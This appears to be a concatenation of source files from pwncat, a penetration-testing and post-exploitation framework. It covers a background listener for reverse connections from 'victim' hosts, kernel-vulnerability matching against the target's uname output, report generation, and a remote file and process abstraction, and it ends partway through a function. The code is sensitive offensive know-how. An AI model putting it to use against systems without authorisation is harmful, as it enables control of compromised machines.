#!/usr/bin/env python3
from rich.prompt import Confirm

import pwncat
from pwncat.util import console
from pwncat.manager import ListenerState
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    Create a new background listener. Background listeners will continue
    listening while you do other things in pwncat. When a connection is
    established, the listener will either queue the new channel for
    future initialization or construct a full session.

    If a platform is provided, a session will automatically be established
    for any new incoming connections. If no platform is provided, the
    channels will be queued, and can be initialized with the 'listeners'
    command.

    If the drop_duplicate option is provided, sessions which connect to
    a host which already has an active session with the same user will
    be automatically dropped. This facilitates an infinite callback implant
    which you don't want to pollute the active session list.
    """

    PROG = "listen"
    ARGS = {
        "--count,-c": Parameter(
            Complete.NONE,
            type=int,
            help="Number of sessions a listener should accept before automatically stopping (default: infinite)",
        ),
        "--platform,-m": Parameter(
            Complete.NONE,
            type=str,
            help="Name of the platform used to automatically construct a session for a new connection",
        ),
        "--ssl": Parameter(
            Complete.NONE,
            action="store_true",
            default=False,
            help="Wrap a new listener in an SSL context",
        ),
        "--ssl-cert": Parameter(
            Complete.LOCAL_FILE,
            help="SSL Server Certificate for SSL wrapped listeners",
        ),
        "--ssl-key": Parameter(
            Complete.LOCAL_FILE,
            help="SSL Server Private Key for SSL wrapped listeners",
        ),
        "--host,-H": Parameter(
            Complete.NONE,
            help="Host address on which to bind (default: 0.0.0.0)",
            default="0.0.0.0",
        ),
        "port": Parameter(
            Complete.NONE,
            type=int,
            help="Port on which to listen for new listeners",
        ),
        "--drop-duplicate,-D": Parameter(
            Complete.NONE,
            action="store_true",
            help="Automatically drop sessions with hosts that are already active",
        ),
    }
    LOCAL = True

    def _drop_duplicate(self, session: "pwncat.manager.Session"):

        for other in session.manager.sessions.values():
            if (
                other is not session
                and session.hash == other.hash
                and session.platform.getuid() == other.platform.getuid()
            ):
                session.log("dropping duplicate session")
                return False

        return True

    def run(self, manager: "pwncat.manager.Manager", args):

        if args.drop_duplicate:
            established = self._drop_duplicate
        else:
            established = None

        if args.platform is None:
            manager.print(
                "You have not specified a platform. Connections will be queued until initialized with the 'listeners' command."
            )
            if not Confirm.ask("Are you sure?"):
                return

        with console.status("creating listener..."):
            listener = manager.create_listener(
                protocol="socket",
                platform=args.platform,
                host=args.host,
                port=args.port,
                ssl=args.ssl,
                ssl_cert=args.ssl_cert,
                ssl_key=args.ssl_key,
                established=established,
                count=args.count,
            )

            while listener.state is ListenerState.STOPPED:
                pass

        if listener.state is ListenerState.FAILED:
            manager.log(
                f"[red]error[/red]: listener startup failed: {listener.failure_exception}"
            )
        else:
            manager.log(f"new listener created for {listener}")



#!/usr/bin/env python3
import json
from typing import List, Optional

import pkg_resources

from pwncat.db import Fact
from pwncat.facts import ArchData, HostnameData
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class KernelVersionData(Fact):
    """
    Represents a W.X.Y-Z kernel version where W is the major version,
    X is the minor version, Y is the patch, and Z is the ABI.

    This explanation came from here:
        https://askubuntu.com/questions/843197/what-are-kernel-version-number-components-w-x-yy-zzz-called
    """

    def __init__(self, source, major, minor, patch, abi):
        super().__init__(source=source, types=["system.kernel.version"])

        self.major: int = major
        self.minor: int = minor
        self.patch: int = patch
        self.abi: str = abi

    def title(self, session):
        return (
            f"Running Linux Kernel [red]{self.major}[/red]."
            f"[green]{self.minor}[/green]."
            f"[blue]{self.patch}[/blue]-[cyan]{self.abi}[/cyan]"
        )


class KernelVulnerabilityData(Fact):
    """
    Data describing a kernel vulnerability which appears to be exploitable
    on the remote host. This is **not** guaranteed to be exploitable, however
    the kernel version number lines up. The `working` property can be
    modified by other modules (e.g. escalate modules) after attempting this
    vulnerability.
    """

    def __init__(self, source, name, versions, link, cve):
        super().__init__(source=source, types=["system.kernel.vuln"])

        self.name: str = name
        self.versions: List[str] = versions
        self.link: Optional[str] = link
        self.cve: Optional[str] = cve
        # All exploits are assumed working, but can be marked as not working
        self.working: bool = True

    def title(self, title):
        line = f"[red]{self.name}[/red]"
        if self.cve is not None:
            line += f" ([cyan]CVE-{self.cve}[/cyan])"
        return line

    def description(self, title):
        line = f"Affected Versions: {repr(self.versions)}\n"
        if self.link:
            line += f"Details: {self.link}"
        return line


class Module(EnumerateModule):
    """
    Enumerate standard system properties provided by the
    `uname` command. This will enumerate the kernel name,
    version, hostname (nodename), machine hardware name,
    and operating system name (normally GNU/Linux).

    This module also provides a similar enumeration to the
    common Linux Exploit Suggester, and will report known
    vulnerabilities which are applicable to the detected
    kernel version.
    """

    PROVIDES = [
        "system.kernel.version",
        "system.hostname",
        "system.arch",
        "system.kernel.vuln",
    ]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session):
        """Run uname and organize information"""

        # Grab the uname output
        output = session.platform.run(
            "uname -s -n -r -m -o", capture_output=True, text=True, check=True
        )

        fields = output.stdout.split(" ")

        # Grab the components
        # kernel_name = fields[0] if fields else None
        hostname = fields[1] if len(fields) > 1 else None
        kernel_revision = fields[2] if len(fields) > 2 else None
        machine_name = fields[3] if len(fields) > 3 else None
        # operating_system = fields[4] if len(fields) > 4 else None

        # Handle kernel versions
        w, x, *y_and_z = kernel_revision.split(".")
        y_and_z = ".".join(y_and_z).split("-")
        y = y_and_z[0]
        z = "-".join(y_and_z[1:])
        version = KernelVersionData(self.name, int(w), int(x), int(y), z)
        yield version

        # Handle arch
        yield ArchData(self.name, machine_name)

        # Handle Hostname
        yield HostnameData(self.name, hostname)

        # Handle Kernel vulnerabilities
        with open(
            pkg_resources.resource_filename("pwncat", "data/lester.json")
        ) as filp:
            vulns = json.load(filp)

            version_string = f"{version.major}.{version.minor}.{version.patch}"
            for name, vuln in vulns.items():
                if version_string not in vuln["vuln"]:
                    continue
                yield KernelVulnerabilityData(
                    self.name,
                    name,
                    vuln["vuln"],
                    vuln.get("mil", None),
                    vuln.get("cve", None),
                )



#!/usr/bin/env python3
import os
import datetime
from typing import List

import jinja2
from rich.markdown import Markdown

import pwncat
from pwncat.util import console, strip_markup
from pwncat.modules import Bool, Argument, BaseModule, ModuleFailed


class Module(BaseModule):
    """
    Run common enumerations and produce a report. Optionally, write the report
    in markdown format to a file.
    """

    PLATFORM = None
    ARGUMENTS = {
        "output": Argument(
            str,
            default="terminal",
            help="Path to markdown file to store report (default: render to terminal)",
        ),
        "template": Argument(
            str,
            default="platform name",
            help="The name of the template to use (default: platform name)",
        ),
        "fmt": Argument(
            str,
            default="md",
            help='The format of the output. This can be "md" or "html". (default: md)',
        ),
        "custom": Argument(
            Bool,
            default=False,
            help="Use a custom template; the template argument must be the path to a jinja2 template",
        ),
    }

    def generate_markdown_table(self, data: List[List], headers: bool = False):
        """Generate a markdown table from the given data and headers"""

        # Get column widths
        widths = [
            max(len(data[r][c]) for r in range(len(data))) for c in range(len(data[0]))
        ]

        rows = []
        for r in range(len(data)):
            rows.append(
                "|"
                + "|".join(
                    [
                        " " + data[r][c] + " " * (widths[c] - len(data[r][c]) + 1)
                        for c in range(len(data[r]))
                    ]
                )
                + "|"
            )

        if headers:
            rows.insert(
                1,
                "|"
                + "|".join([" " + "-" * widths[c] + " " for c in range(len(data[r]))])
                + "|",
            )

        return "  \n".join(rows)

    def run(self, session: "pwncat.manager.Session", output, template, fmt, custom):
        """Perform enumeration and optionally write report"""

        if custom:
            env = jinja2.Environment(
                loader=jinja2.FileSystemLoader(os.getcwd()),
                # autoescape=jinja2.select_autoescape(["md", "html"]),
                trim_blocks=True,
                lstrip_blocks=True,
            )
        else:
            env = jinja2.Environment(
                loader=jinja2.PackageLoader("pwncat", "data/reports"),
                # autoescape=jinja2.select_autoescape(["md", "html"]),
                trim_blocks=True,
                lstrip_blocks=True,
            )

        if template == "platform name":
            use_platform = True
            template = session.platform.name
        else:
            use_platform = False

        env.filters["first_or_none"] = lambda thing: thing[0] if thing else None
        env.filters["attr_or"] = (
            lambda fact, name, default=None: getattr(fact, name)
            if fact is not None
            else default
        )
        env.filters["title_or_unknown"] = (
            lambda fact: strip_markup(fact.title(session))
            if fact is not None
            else "unknown"
        )
        env.filters["remove_rich"] = lambda thing: strip_markup(str(thing))
        env.filters["table"] = self.generate_markdown_table

        try:
            template = env.get_template(f"{template}.{fmt}")
        except jinja2.TemplateNotFound as exc:
            if use_platform:
                try:
                    template = env.get_template(f"generic.{fmt}")
                except jinja2.TemplateNotFound as exc:
                    raise ModuleFailed(str(exc)) from exc
            else:
                raise ModuleFailed(str(exc)) from exc

        # Just some convenience things for the templates
        context = {
            "target": session.target,
            "manager": session.manager,
            "session": session,
            "platform": session.platform,
            "datetime": datetime.datetime.now(),
        }

        try:
            if output != "terminal":
                with open(output, "w") as filp:
                    template.stream(context).dump(filp)
            else:
                markdown = Markdown(template.render(context), hyperlinks=False)
                console.print(markdown)
        except jinja2.TemplateError as exc:
            raise ModuleFailed(str(exc)) from exc



"""
A platform is the pwncat abstraction for an OS or specific distribution. In general,
this abstraction allows pwncat to generically interact with targets at the OS level.
For example, a platform provides a ``pathlib.Path`` implementation which provides
seamless file access. A platform also defines ways to query environment variables,
get the current user ID and name and generically start processes.

An individual platform must define a set of methods within it's ``Platform`` class
for file abstraction, process abstraction, and user abstraction. These methods are
then used by the generic ``Path`` and ``Popen`` classes to abstract interaction
with the target.

Normally, you can access a platform through a session. Every session has a platform
property which returns a platform-specific implementation of the core methods outlined
below.

pathlib-like File Abstraction
-----------------------------

Each platform sets the ``Path`` property to a class which glues our generic ``Path``
class below to either ``PureWindowsPath`` or ``PureLinuxPath``. You can construct
a session-specific path object by utilizing the ``session.platform.Path`` property.

.. code-block:: python

    path = session.platform.Path("/etc/passwd")
    print(path.read_text())

"""
import os
import sys
import stat
import fnmatch
import logging
import threading
import logging.handlers
from abc import ABC, abstractmethod
from typing import List, Type, Union, BinaryIO, Optional, Generator
from subprocess import CalledProcessError

from rich.logging import RichHandler

import pwncat
import pwncat.channel
import pwncat.subprocess

PLATFORM_TYPES = {}
""" A dictionary of platform names mapping to their class
objects. This drives the ``pwncat.platform.create`` factory
function. """


class PlatformError(Exception):
    """Generic platform error."""


class Path:
    """
    A Concrete-Path. An instance of this class is bound to a
    specific victim, and supports all semantics of a standard
    pathlib concrete Path.
    """

    _target: "Platform"
    _stat: os.stat_result
    _lstat: os.stat_result
    parts = []

    @classmethod
    def cwd(cls) -> "Path":
        """Return a new concrete path referencing the current directory"""
        return cls(".").resolve()

    @classmethod
    def home(cls) -> "Path":
        """Return a new concrete path referencing the current user home directory"""
        return cls("~").resolve()

    def writable(self) -> bool:
        """Test if this file is writable based on the stat results
        and the sessions current user/group ID."""

        user = self._target.session.current_user()
        group = self._target.session.find_group(gid=user.gid)
        mode = self.stat().st_mode
        uid = self.stat().st_uid
        gid = self.stat().st_gid

        if uid == user.id and (mode & stat.S_IWUSR):
            return True
        elif group.id == gid and (mode & stat.S_IWGRP):
            return True
        else:
            if group.id == gid and (mode & stat.S_IWGRP):
                return True
            else:
                if mode & stat.S_IWOTH:
                    return True

        return False

    def readable(self) -> bool:
        """Test if this file is readable based on the stat results and
        the sessions' current user/group ID."""

        user = self._target.session.current_user()
        group = self._target.session.find_group(gid=user.gid)
        mode = self.stat().st_mode
        uid = self.stat().st_uid
        gid = self.stat().st_gid

        if uid == user.id and (mode & stat.S_IRUSR):
            return True
        elif group.id == gid and (mode & stat.S_IRGRP):
            return True
        else:
            if group.id == gid and (mode & stat.S_IRGRP):
                return True
            else:
                if mode & stat.S_IROTH:
                    return True

        return False

    def stat(self) -> os.stat_result:
        """Request file stat details"""

        if self._stat is not None:
            return self._stat

        self._stat = self._target.stat(str(self))

        return self._stat

    def chmod(self, mode: int):
        """Modify file unix permissions

        :param mode: unix permission bits
        :type mode: int
        """

        self._target.chmod(str(self), mode)

    def exists(self) -> bool:
        """Test if the path exists on the target system"""

        try:
            self.stat()
            return True
        except FileNotFoundError:
            return False

    def expanduser(self) -> "Path":
        """Return a new path object which represents the full path to the file
        expanding any ``~`` or ``~user`` components."""

        if not self.parts[0].startswith("~"):
            return self.__class__(self)

        if self.parts[0] == "~":
            return self.__class__(
                self._target.find_user(self._target.whoami()).homedir, *self.parts[1:]
            )
        else:
            return self.__class__(
                self._target.find_user(self.parts[0][1:]).homedir, *self.parts[1:]
            )

    def glob(self, pattern: str) -> Generator["Path", None, None]:
        """Glob the given relative pattern in the directory represented
        by this path, yielding Path objects for any matching files/directories."""

        for name in self._target.listdir(str(self)):
            if fnmatch.fnmatch(name, pattern):
                yield self / name

    def group(self) -> str:
        """Returns the name of the group owning the file. KeyError is raised
        if the file's GID isn't found in the system database."""

        return self._target.session.find_group(gid=self.stat().st_gid).name

    def is_dir(self) -> bool:
        """Returns True if the path points to a directory (or a symbolic link
        pointing to a directory). False if it points to another kind of file.
        """

        try:
            return stat.S_ISDIR(self.stat().st_mode)
        except (FileNotFoundError, PermissionError):
            return False

    def is_file(self) -> bool:
        """Returns True if the path points to a regular file"""

        try:
            return stat.S_ISREG(self.stat().st_mode)
        except (FileNotFoundError, PermissionError):
            return False

    def is_mount(self) -> bool:
        """Returns True if the path is a mount point."""

        if str(self) == "/":
            return True

        if self.parent.stat().st_dev != self.stat().st_dev:
            return True

        return False

    def is_symlink(self) -> bool:
        """Returns True if the path points to a symbolic link, False otherwise"""

        try:
            return stat.S_ISLNK(self.stat().st_mode)
        except (FileNotFoundError, PermissionError):
            return False

    def is_socket(self) -> bool:
        """Returns True if the path points to a Unix socket"""

        try:
            return stat.S_ISSOCK(self.stat().st_mode)
        except (FileNotFoundError, PermissionError):
            return False

    def is_fifo(self) -> bool:
        """Returns True if the path points to a FIFO"""

        try:
            return stat.S_ISFIFO(self.stat().st_mode)
        except (FileNotFoundError, PermissionError):
            return False

    def is_block_device(self) -> bool:
        """Returns True if the path points to a block device"""

        try:
            return stat.S_ISBLK(self.stat().st_mode)
        except (FileNotFoundError, PermissionError):
            return False

    def is_char_device(self) -> bool:
        """Returns True if the path points to a character device"""

        try:
            return stat.S_ISCHR(self.stat().st_mode)
        except (FileNotFoundError, PermissionError):
            return False

    def iterdir(self) -> bool:
        """When the path points to a directory, yield path objects of the
        directory contents."""

        if not self.is_dir():
            raise NotADirectoryError

        for name in self._target.listdir(str(self)):
            if name == "." or name == "..":
                continue
            yield self.__class__(*self.parts, name)

    def lchmod(self, mode: int):
        """Modify a symbolic link's mode (same as chmod for non-symbolic links)"""

        self._target.chmod(str(self), mode, link=True)

    def lstat(self) -> os.stat_result:
        """Same as stat except operate on the symbolic link file itself rather
        than the file it points to."""

        if self._lstat is not None:
            return self._lstat

        self._lstat = self._target.lstat(str(self))

        return self._lstat

    def mkdir(self, mode: int = 0o777, parents: bool = False, exist_ok: bool = False):
        """Create a new directory at this given path."""

        if not exist_ok and self.exists():
            raise FileExistsError(str(self))

        if self.exists() and not self.is_dir():
            raise FileExistsError(str(self))

        self._target.mkdir(str(self), mode=mode, parents=parents)

    def open(
        self,
        mode: str = "r",
        buffering: int = -1,
        encoding: str = None,
        errors: str = None,
        newline: str = None,
    ):
        """Open the file pointed to by the path, like Platform.open"""

        return self._target.open(
            str(self),
            mode=mode,
            buffering=buffering,
            encoding=encoding,
            errors=errors,
            newline=newline,
        )

    def owner(self) -> str:
        """Return the name of the user owning the file. KeyError is raised if
        the file's uid is not found in the System database"""

        return self._target.session.find_user(uid=self.stat().st_uid).name

    def read_bytes(self) -> bytes:
        """Return the binary contents of the pointed-to file as a bytes object"""

        with self.open("rb") as filp:
            return filp.read()

    def read_text(self, encoding: str = None, errors: str = None) -> str:
        """Return the decoded contents of the pointed-to file as a string"""

        with self.open("r", encoding=encoding, errors=errors) as filp:
            return filp.read()

    def readlink(self) -> "Path":
        """Return the path to which the symbolic link points"""

        return self._target.readlink(str(self))

    def rename(self, target) -> "Path":
        """Rename the file or directory to the given target (str or Path)."""

        self._target.rename(str(self), str(target))

        if not isinstance(target, self.__class__):
            return self.__class__(target)

        return target

    def replace(self, target) -> "Path":
        """Same as `rename` for Linux"""

        return self.rename(target)

    def resolve(self, strict: bool = False):
        """Resolve the current path into an absolute path"""

        return self.__class__(self._target.abspath(str(self)))

    def rglob(self, pattern: str) -> Generator["Path", None, None]:
        r"""This is like calling Path.glob() with "\*\*/" added to in the front
        of the given relative pattern"""

        return self.glob("**/" + pattern)

    def rmdir(self):
        """Remove this directory. The directory must be empty."""

        if not self.is_dir():
            raise NotADirectoryError(str(self))

        self._target.rmdir(str(self))

    def samefile(self, otherpath: "Path"):
        """Return whether this path points to the same file as other_path
        which can be either a Path object or a string."""

        if not isinstance(otherpath, Path):
            otherpath = self.__class__(otherpath)

        stat1 = self.stat()
        stat2 = otherpath.stat()

        return os.path.samestat(stat1, stat2)

    def symlink_to(self, target, target_is_directory: bool = False):
        """Make this path a symbolic link to target."""

        if not isinstance(target, self.__class__):
            target = self.__class__(target)

        if not target.exists():
            raise FileNotFoundError(str(target))

        if self.exists():
            raise FileExistsError(str(self))

        try:
            self._target.symlink_to(str(target), str(self))
        except CalledProcessError as exc:
            raise OSError(exc.stdout) from exc

    def touch(self, mode: int = 0o666, exist_ok: bool = True):
        """Create a file at this path. If the file already exists, function
        succeeds if exist_ok is true (and it's modification time is updated).
        Otherwise FileExistsError is raised."""

        existed = self.exists()

        if not exist_ok and existed:
            raise FileExistsError(str(self))

        self._target.touch(str(self))

        if not existed:
            self.chmod(mode)

    def unlink(self, missing_ok: bool = False):
        """Remove the file or symbolic link."""

        if not missing_ok and not self.exists():
            raise FileNotFoundError(str(self))

        try:
            self._target.unlink(str(self))
        except FileNotFoundError as exc:
            # In this case, we couldn't distinguish between errors
            # so, we distinguish here based on stat results
            if self.is_dir():
                raise OSError(f"Directory not empty: {str(self)}") from exc
            raise

    def link_to(self, target):
        """Create a hard link pointing to a path named target"""

        if not isinstance(target, self.__class__):
            target = self.__class__(target)

        if not target.exists():
            raise FileNotFoundError(str(target))

        if self.exists():
            raise FileExistsError(str(self))

        try:
            self._target.link_to(str(target), str(self))
        except CalledProcessError as exc:
            raise OSError(exc.stdout) from exc

    def write_bytes(self, data: bytes):
        """Open the file pointed to in bytes mode and write data to it."""

        with self.open("wb") as filp:
            filp.write(data)

    def write_text(self, data: str, encoding: str = None, errors: str = None):
        """Open the file pointed to in text mode, and write data to it."""

        with self.open("w", encoding=encoding, errors=errors) as filp:
            filp.write(data)


class Platform(ABC):
    """Abstracts interactions with a target of a specific platform.
    This includes running commands, changing directories, locating
    binaries, etc.

    During construction, the channel ``connect`` method is called
    to complete any outstanding requirements for connecting the channel.
    If the channel is not connected after this, a ``PlatformError``
    is raised.

    Platform's are not created directly, but can be instantiated
    through the manager ``create_session`` method.

    :param session: a session object to which this platform is bound
    :param channel: an open a channel with the specified platform
    :type channel: pwncat.channel.Channel
    :param log: path to a log file which logs each command executed for this platform
    :type log: str
    """

    name = None
    """ Name of this platform (e.g. "linux") """

    def __init__(
        self,
        session: "pwncat.manager.Session",
        channel: "pwncat.channel.Channel",
        log: str = None,
        verbose: bool = False,
    ):

        # This will throw a ChannelError if we can't complete the
        # connection, so we do it first.
        channel.connect()

        # Ensure everything is kosher with the channel
        if not channel.connected:
            raise PlatformError("channel connection failed")

        self.session = session
        self.channel = channel
        self.logger = logging.getLogger(str(id(channel)))
        self.logger.setLevel(logging.DEBUG)
        self._verbose_logging_handler = None
        self.name = "unknown"
        self._current_user = None

        # output log to a file
        if log is not None:
            handler = logging.handlers.RotatingFileHandler(
                log, maxBytes=1024 * 1024 * 100, backupCount=5
            )
            handler.setFormatter(logging.Formatter("%(asctime)s - %(message)s"))
            self.logger.addHandler(handler)

        # set the logging verbosity
        self.set_verbose(verbose)

        base_path = self.PATH_TYPE
        target = self

        class RemotePath(base_path, Path):

            _target = target
            _stat = None

            def __init__(self, *args):
                base_path.__init__(*args)

        self.Path = RemotePath
        """ A concrete Path object for this platform conforming to pathlib.Path """

    @property
    def manager(self):
        """Shortcut to accessing the manager"""
        return self.session.manager

    def interactive_loop(self, interactive_complete: "threading.Event"):
        """Handles interactive piping of data between victim and attacker. If
        the platform you are implementing does not support raw mode, you must
        override this method to support interactivity. A working example with
        the python readline module exists in the windows platform. Linux uses
        this default implementation."""

        sys.stdin
        has_prefix = False

        pwncat.util.push_term_state()

        try:
            pwncat.util.enter_raw_mode(non_block=False)
            sys.stdin.reconfigure(line_buffering=False)

            while not interactive_complete.is_set():
                data = sys.stdin.buffer.read(64)
                has_prefix = self.session.manager._process_input(data, has_prefix)

        except KeyboardInterrupt:
            # This is a hack to allow the output thread to signal completion
            # We are in raw mode so this couldn't have come from a user pressing
            # C-d.
            pass
        finally:
            pwncat.util.pop_term_state()
            sys.stdin.reconfigure(line_buffering=False)

    def process_output(self, data):
        """Called during interactivity to handle output from the victim. It can
        mutate the output and return a changed value if needed. It does nothing
        by default."""

        return data

    def __str__(self):
        """Retrieve a string describing the platform connection"""
        return str(self.channel)

    @abstractmethod
    def exit(self):
        """Exit this session"""

    @abstractmethod
    def refresh_uid(self) -> Union[int, str]:
        """Refresh the cached UID of the current session."""

    @abstractmethod
    def getuid(self) -> Union[int, str]:
        """Get the current user ID. This should not query the target, but should
        return the current cached UID as found with `refresh_uid`."""

    @abstractmethod
    def getenv(self, name: str) -> str:
        """Get the value of an environment variable.

        :param name: the name of the environment variable
        :type name: str
        :rtype: str
        """

    @abstractmethod
    def stat(self, path: str) -> os.stat_result:
        """Run stat on a path on the remote system and return a stat result
        This is mainly used by the concrete Path type to fill in a majority
        of it's methods. If the specified path does not exist or cannot be
        accessed, a FileNotFoundError or PermissionError is raised respectively

        :param path: path to a remote file
        :type path: str
        """

    @abstractmethod
    def lstat(self, path: str) -> os.stat_result:
        """Run stat on the symbolic link and return a stat result object.
        This has the same semantics as the `stat` method."""

    @abstractmethod
    def abspath(self, path: str) -> str:
        """Attempt to resolve a path to an absolute path"""

    @abstractmethod
    def readlink(self, path: str):
        """Attempt to read the target of a link"""

    @abstractmethod
    def whoami(self):
        """Retrieve's only name of the current user (may be faster depending
        on platform)"""

    @abstractmethod
    def listdir(self, path=None) -> Generator[str, None, None]:
        """List the contents of a directory. If ``path`` is None,
        then the contents of the current directory is listed. The
        list is not guaranteed to be sorted in any way.

        :param path: the directory to list
        :type path: str or Path-like
        :raise FileNotFoundError: When the requested directory is not a directory,
          does not exist, or you do not have execute permissions.
        """

    @abstractmethod
    def get_host_hash(self) -> str:
        """
        Retrieve a string which uniquely identifies this victim host. On Unix-like
        platforms, this retrieves the hostname and MAC addresses of any available
        network interfaces and computes a hash, which should be unique regardless of
        connection method.

        :return: a unique string (normally a hash) identifying this host
        :rtype: str
        """

    def which(self, name: str, **kwargs) -> str:
        """
        Locate the specified binary on the remote host. Normally, this is done through
        the local `which` command on the remote host (for unix-like hosts), but can be
        located by any means. The returned path string is guaranteed to exist on the
        remote host and provide the capabilities of the requested binary.

        :param name: name of the binary (e.g. "tar" or "dd")
        :type name: Union[list, str]
        :return: full path to the requested binary
        :rtype: str
        :raises: FileNotFoundError: the requested binary does not exist on this host
        """

        """
        TODO: We should do something about the `which` statement that is sometimes
        passed in, if we were using busybox.
        """

        if not isinstance(name, str):
            for n in name:
                path = self.which(n)
                if path is not None:
                    return path
            return None

        if name in self.session.target.utilities:
            return self.session.target.utilities[name]

        path = self._do_which(name)
        # self.session.db.transaction_manager.begin()
        self.session.target.utilities[name] = path
        self.session.db.transaction_manager.commit()

        return path

    @abstractmethod
    def _do_which(self, name: str) -> Optional[str]:
        """
        This is stub method which must be implemented by the platform. It is
        guaranteed to request to results directly from the victim whereas the
        `which` method will query the database first for cached items. It
        should not be invoked directly, but will be indirectly invoked when
        needed by `which`
        """

    def compile(
        self,
        sources: List[Union[str, BinaryIO]],
        output: str = None,
        suffix: str = None,
        cflags: List[str] = None,
        ldflags: List[str] = None,
    ) -> str:
        """
        Attempt to compile the given C source files into a binary suitable for the remote
        host. If a compiler exists on the remote host, prefer compilation locally. If no
        compiler exists on the remote remote host, check the `cross` global config variable
        for the path to a local compiler capable of generating binaries for the remote host.
        If the binary is compiled locally, it is automatically uploaded to the remote host.
        The path to the new binary on the victim is returned.

        :param sources: list of source file paths or IO streams used as source files
        :type sources: List[Union[str, io.IOBase]]
        :param output: base name of the output file. If not specified, a name is randomly generated.
        :type output: str
        :param suffix: a suffix to add to the output name.
        :type suffix: str
        :param cflags: a list of flags to pass to the compiler
        :type cflags: List[str]
        :param ldflags: a list of flags to pass to the linker
        :type ldflags: List[str]
        :return: str
        :raises NotImplementedError: this platform does not support c compilation
        :raises PlatformError: no local or cross compiler detected or compilation failed
        """

        raise NotImplementedError(f"no C compilation support available on {self.name}")

    @abstractmethod
    def Popen(
        self,
        args,
        stdin=None,
        stdout=None,
        stderr=None,
        shell=False,
        cwd=None,
        encoding=None,
        errors=None,
        text=None,
        env=None,
        universal_newlines=None,
        **other_popen_kwargs,
    ) -> pwncat.subprocess.Popen:
        """
        Execute a process on the remote host with an interface similar to
        that of the python standard ``subprocess.Popen``. The returned
        object behaves much like a standard ``Popen`` object and conforms
        to the interface defined by ``pwncat.subprocess.Popen``. For
        an explanation of arguments, see ``pwncat.subprocess.Popen``.
        """

    def run(
        self,
        args,
        stdin=None,
        input=None,
        stdout=None,
        stderr=None,
        capture_output=False,
        shell=False,
        cwd=None,
        timeout=None,
        check=False,
        encoding=None,
        errors=None,
        text=None,
        env=None,
        universal_newlines=None,
        popen_class=None,
        **other_popen_kwargs,
    ) -> pwncat.subprocess.Popen:
        """
        Run the given command utilizing the ``self.popen`` method and
        return a ``pwncat.subprocess.CompletedProcess`` instance.
        """

        if capture_output:
            stdout = pwncat.subprocess.PIPE
            stderr = pwncat.subprocess.PIPE

        if input is not None:
            stdin = pwncat.subprocess.PIPE

        if popen_class is None:
            popen_class = self.Popen

        p = popen_class(
            args,
            stdin=stdin,
            stdout=stdout,
            stderr=stderr,
            shell=shell,
            cwd=cwd,
            encoding=encoding,
            text=text,
            errors=errors,
            env=env,
            **other_popen_kwargs,
        )

        stdout, stderr = p.communicate(input=input, timeout=timeout)

        completed_proc = pwncat.subprocess.CompletedProcess(
            args, p.returncode, stdout, stderr
        )

        if check:
            completed_proc.check_returncode()

        return completed_proc

    @abstractmethod
    def chdir(self, path: Union[str, Path]):
        """
        Change directories to the given path. This method returns the current
        working directory prior to the change.

        :param path: a relative or absolute path to change to
        :type path: Union[str, Path]
        :return: current working directory prior to the change
        :raises:
          FileNotFoundError: the specified path doesn't exist
          NotADirectoryError: the specified path is not a directory
        """

    @abstractmethod
    def open(self, path: Union[str, Path], mode: str):
        """
        Open a remote file for reading or writing. Normally, only one of read or
        write modes are allowed for a remote file, but this may change with
        future platforms. It is recommended to only use one mode when opening
        remote files. This method attempts to replicate the built-in ``open``
        function and returns a file-like object. The `b` mode is honored and
        if not present, a TextIOWrapper is used to wrap the file object to ensure
        text data is returned.

        :param path: path to the file
        :type path: Union[str, Path]
        :param mode: the open-mode (see built-in ``open``)
        :type mode: str
        :return: a file-like object
        :raises:
          FileNotFoundError: the specified file does not exist
          IsADirectoryError: the specified path refers to a directory
        """

    @abstractmethod
    def tempfile(
        self, mode: str, length: Optional[int] = None, suffix: Optional[str] = None
    ):
        """
        Create a temporary file on the remote host and open it with the specified mode.
        Creating a new temporary file with a mode other than "w" is mostly useless,
        however ``mode`` can be used to specify a binary or text-mode file. The length
        argument is useful if you know the length of file you are about to read. This
        alleviates some situations which could be complicated on some platforms by not
        knowing the intended file length prior to opening. Optionally, a suffix can be
        added to the random file name. A file-like object is returned. The temporary
        file is not removed by pwncat itself. Unless explicitly removed, it will continue
        to exist until the remote operating system cleans up temporary files (possible
        at the next reboot).

        :param mode: the open-mode for the new file-like object
        :type mode: str
        :param length: the intended length for the new file
        :type length: int
        :param suffix: a suffix for the filename
        :type suffix: str
        :return: a file-like object
        """

    def su(self, user: str, password: Optional[str] = None):
        """
        Attempt to switch users in the running shell. This normally executes a new
        sub-shell as the requested user. On unix-like systems, this is simply a
        wrapper for the ``su`` command. Implementations may differ on other systems.
        If a password isn't provided, the database will be consulted for a matching
        username and password.

        :param user: the name of the new user
        :type user: str
        :param password: the password for the new user
        :type password: str
        :raises:
          PermissionError: the provided password was incorrect
        """

        raise NotImplementedError(
            f"switch-user not implemented for platform {self.name}"
        )

    def sudo(
        self,
        command: Union[str, List[str]],
        user: Optional[str] = None,
        group: Optional[str] = None,
        **popen_kwargs,
    ):
        """
        Run the specified command as the specified user and group. On unix-like systems
        the normally translates to the ``sudo`` command. The command is executed using
        the ``self.popen`` method. All arguments not documented here are passed directly
        to ``self.popen``. The process is executed and if a password is required, it is
        sent from the database. If a password is not available, the process is killed
        and a PermissionError is raised. If the password is incorrect, a PermissionError
        is also raised.
        """

        raise NotImplementedError(f"sudo not implemented for platform {self.name}")

    @abstractmethod
    def umask(self, mask: int = None):
        """Set or retrieve the current umask value"""

    @abstractmethod
    def touch(self, path: str):
        """Update a file modification time and possibly create it"""

    @abstractmethod
    def chmod(self, path: str, mode: int, link: bool = False):
        """Update the file permissions"""

    @abstractmethod
    def mkdir(self, path: str, mode: int = 0o777, parents: bool = False):
        """Create a new directory"""

    @abstractmethod
    def rename(self, source: str, target: str):
        """Rename a file from the source to the target. This should
        replace the target if it exists."""

    @abstractmethod
    def rmdir(self, target: str):
        """Remove the specified directory. It must be empty."""

    @abstractmethod
    def symlink_to(self, source: str, target: str):
        """Create a symbolic link to source from target"""

    @abstractmethod
    def link_to(self, source: str, target: str):
        """Create a filesystem hard link."""

    @abstractmethod
    def unlink(self, target: str):
        """Remove a link to a file (similar to `rm`)"""

    def set_verbose(self, verbose: bool):
        """Enable or disable verbose output
        If enabled, commands that are executed by `pwncat`
        are logged in the output for the user
        otherwise `pwncat` do not show them"""

        # if `verbose` is `True` and there is no handler for it
